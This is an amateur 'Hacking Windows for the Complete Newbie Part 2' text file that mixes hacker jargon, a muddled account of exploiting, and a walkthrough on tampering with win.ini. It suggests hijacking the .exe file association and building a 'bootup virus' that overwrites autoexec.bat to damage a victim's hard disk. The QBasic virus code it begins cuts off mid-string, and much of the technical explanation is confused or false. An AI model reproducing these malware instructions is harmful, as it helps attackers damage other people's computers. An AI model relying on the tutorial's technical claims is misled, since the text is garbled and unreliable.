Hacking Windows for The Complete Newbie Part 2 By: SLIPStream (formerly known as Morbos or Dynamite) Contact information located at the end of the file. (Please note: Newbie is not meant to be used as a put down. All great hackers were once newbies so please dont get POed about the terminology!) :) WARNING: This file contains some elements which are considered illigal in most countries including the united states. The author assumes no responsiblity for the actions of the reader after reading this file. The reader hereby understands that the file is for educational purposes ONLY. The author does not encourage illigal activity and cannot be held responsible for the readers actions. If you agree to this, procede in reading the file, otherwise, please exit now. Ok. If you read the Part 1 to this text file you should have no problem understanding this one. This file contains alot of code, so you need some compilers. First of all download these. They're good tools for you to have as a hacker: QBasic 4.5 Dev-C++ (or use another C++ compiler) Cain and Abel Password cracker L0phtCrack AIM (AOL Instant Messenger) Java2 SDK NASM for windows FileBinder Once you have all this stuff you can get started. This file assumes that you have read the previous Part (part 1). Section 1: H4X0R 3L337 73RM1N0L0GY (Hacker Eleet Terminology) On the internet your gonna meet alot of hackers who claim to be "3L33T" (Eleet). I probably wouldnt take their word for it. Most of them are probably Script Kiddies (explained later). But who knows, maybe some of them are really 3L33T ;) Anyways, here is some hacker terminology that you should become farmiliar with: Firewall: A piece of software designed to "Harden the Target". "Hardening the Target": Old hacker saying: No computer is unbreakable. But the computer can be 'hardened' from attackers. This term is popular with security experts. Router: A hardware device which stands as an intermediate between the computer and the internet. Multiple computers can be attached to the same router. Normaly used for networking however, one computer can use its own router. Programming: If you dont know this one by now then you probably should take a step back and read about it. A program is a set of instructions which tells the computer what to do. TCP/IP: Transmition Control Protocol/Internet protocol. Basicly, this is the internet. Theres more about this then i could possibly explain to you in one text file. Grid: A computer network arranged in the form of a grid. Normaly used by large corperations. Node: Any single computer attached to a large network. OS: Operating System. Explained later. Thats not the half of it. But its enough to get you through this tutorial. Section 2: Im lost Im sure you probably are. Dont take to big a bite out of the computer world or you'll get completely lost. In the world of computers, things can get really hard, really fast. Assuming that you read the last part, lets get started. CODING!!!! As a hacker, your going to be doing alot of coding. Hacking isn't instant. It requires work and effort. Your first languages should be C, C++, Python, and if your witty, QBasic. What??? QBasic??? You Newb! No. No matter what people say, QBasic still remains one of the most clasic programing languages (Not to mention the easiest and effective). The only thing that is missing from the QBasic language is the ability to use the TCP/IP protocol from the programming console (apart from dos access to the net commands) Pretend you already know some programming (You should read some files on it). You need to know how to exploit! Exploiting is the act of finding a flaw on a computer system (or in a program or operating system), and using this flaw to break in to the selected system. These exploits are usualy created through the process of exploitation, shown below: Program or Operating ---------> Decompile code System or \ \ _\/ \ \ See Visible \ flaws ------------> Write Code or Perform action to exploit flaw Incase that wasnt clear for you, heres an example: A computer hacker is looking at a list of his open ports to see how he can harden his computer when he notices that the NetBIOS port is left open. He does some research and discovers that this port is used for file and printer sharing. He askes around on some hacker BBS's, and finds out that not many windows users know about this flaw, and do not password agains it. So, he finds out how to connect to this port, and writes a simple batch file that exploits this flaw. Get it? With this knowledge, you too can write exploit code. Lets start off with some pre-made exploits: Windows.ini Flaws - Windows.ini (or on XP, win.ini) is a ticking time bomb waiting to explode. It contains code which controls the way windows runs programs, shares files and folders, even what programs run under certain file extentions. Here is a piece of a win.ini file: ; for 16-bit app support part1 [fonts] part2 [extensions] part3 [mci extensions] part4 [files] part5 [Mail] MAPI=1 CMC=1 CMCDLLNAME=mapi.dll CMCDLLNAME32=mapi32.dll MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 part6 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo2 asx=MPEGVideo2 au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo2 mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo2 mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo2 wm=MPEGVideo2 wma=MPEGVideo2 wmv=MPEGVideo2 wmx=MPEGVideo2 wvx=MPEGVideo2 part7 [WAOL] AppPath=E:\Program Files\America Online 9.0 SharedPath=E:\Program Files\Common Files\AOLSHARE Ok, lets break it down. Part 1, fonts. Absolutely nothing interesting here. Even if you could, it would be boring to exploit a users fonts. [extensions] - normaly, there would be something here, but aparently this computer is storing its extension library somewhere else. [mail] - this computer seems to support the MAPI protocol. Whats MAPI? No, its not the old arcade game. MAPI is a mail protocol, its kind of old, but still useful. Now, most mail is POP3 or SMTP. [MCI Extensions.BAK] - Not much to exploit here. But you could mess with the users file extentions. You could inject the code: exe=MPEGVideo To the end of this section and it would force the computer to run its default MPEG video player (such as windows media player) with it instead of executing the file. [WAOL] - Aparently this user uses aol. Hehe. AOL is very easy to exploit, as explained in the last part. Well, not much can be exploited from here. BUT WAIT!!! There was a DLL file listed in part 5! Lets run a search. Searching for MAPI.DLL... There were 5 files found. Did you find what you wanted? Lets take a look: sfmapi.dll MAPI.DLL HMMAPI.DLL HIPMAPI.DLL aimapi.dll Lets look into the MAPI.DLL file... WHOAH!!! Tons of encrypted, boring code. Nothing to exploit here. Whats that last thing I see on the list? aimapi.dll? Wait... Thats not artificial inteligence mapi... Its the AIM API!!!! Whats that? An API is an application programing interface. An application programming interface is a big library used to code. Its so that they wont have to rewrite the code over and over again. Lets look inside... Nothing... Hmmm, wait! Theres unencrypted code here!!! There is some code here. Take a look for yourself, its located in C:\Program Files\AIM The file's named aimapi.dll. Open it up and look at the code. Hmm. This is interesting. Theres code, lets look. %BASE%\aim.exe This is about the only real help in the file. Hmm... What does this mean? %BASE% must mean the default directory for AIM. Aim.exe, well, thats self explanitory. This really isnt very much help. But, we can exploit this. Ok, first of all, lets write some code. This one is going to be a bootup virus. What is a bootup virus? A bootup virus is simply a virus that executes during startup! Doi! ;) Ok, here we go. Open up your qbasic compiler and lets get started! First of all we need to know how to make a boot virus. A real boot virus is one normaly written in ASM, which writes itself to the bootsector of a computer, so that it will damage the hard disk or other drives during the boot process, virtualy undetectable. This boot virus will be a simple batch file binded to an exe file. This program will be small enough to fit through a 56k dialup line, but big enough to not arouse suspision. The virus overwrites autoexec.bat (the file executed on startup), then writes its own code to it. This code is malicious, so it will greatly damage the victems hard disk, but it will not completely destroy it. The effects are still reversable, but it will cause the target much frustration. Ok, lets start by taking a look at autoexec.bat. WARNING! This exploit will not work on windows XP. Windows XP runs on the NTFS filesystem, not a FAT filesystem. This means that DOS must be emulated. XP runs its own startup sequence, however it is not a bat file. It should be located at C:\AUTOEXEC.BAT Open it with notepad or the windows edit command. Now you can look at it and see what is executing on your computer startup. Ok, heres some QBasic code: '******Start Copying Here******* dim line1 as string dim line2 as string dim line3 as string dim line4 as string dim line5 as string dim win1 as string dim win2 as string dim win3 as string dim win4 as string dim win5 as string dim win6 as string dim win7 as string dim win8 as string dim background as string dim background1 as string win1 = "[fonts]" win2 = "[extensions]" win3 = "[mci extensions]" win4 = "[files]" win5 = "[MCI Extensions.BAK]" win6 = "[WAOL]" win7 = "AppPath=C:\AUTOEXEC.BAT" win8 = "SharedPath=E:\Program Files\Common Files\AOLSHARE" 'Important stuff background = "[Desktop]" background1 = "Wallpaper=C:\WINDOWS\SYS32x1.html" html1 = "
html4 = "